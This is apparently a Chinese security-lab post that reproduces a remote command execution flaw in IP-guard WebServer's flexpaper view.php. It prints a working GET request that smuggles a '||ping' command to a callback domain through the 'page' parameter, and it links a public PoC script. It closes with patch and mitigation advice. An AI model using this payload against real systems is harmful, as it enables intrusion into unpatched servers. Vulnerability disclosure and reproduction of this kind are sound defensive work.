网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
在数字化时代,医药企业在信息化进程中不可避免地面临着日益增长的数据资产威胁。为了确保其关键信息资产的安全性、机密性和可用性,医药企业日益倚重于先进的信息安全解决方案。其中,备受瞩目的IP-guard产品在医药领域展现出强大的技术力量,为企业提供了全方位的信息安全保障。
IP-guard作为专业的信息安全管理和数据防泄漏解决方案,为企业的关键数据资产提供强有力的保护。其在各行各业都备受欢迎,尤其在医药领域,其价值更是凸显。
IP-guard WebServer version < 4.81.0307.0
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=%7C%7Cping%20eqybzuydly.dgrh3.cn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Connection: keep-aliveAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Host: 127.0.0.1
ping域名执行成功
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.ip-guard.net/https://github.com/MD-SEC/MDPOCS/blob/main/Ip_Guard_Webserver_View_Rce_Poc.py
1.使用安全防护类设备对相关资产进行防护。
2.避免将IP-guard WebServer暴露在互联网,通过白名单访问。
3.在确认不影响业务的情况下,可以直接删除存在漏洞的文件。
原文始发于微信公众号(弥天安全实验室):【成功复现】IP-guard flexpaper远程命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论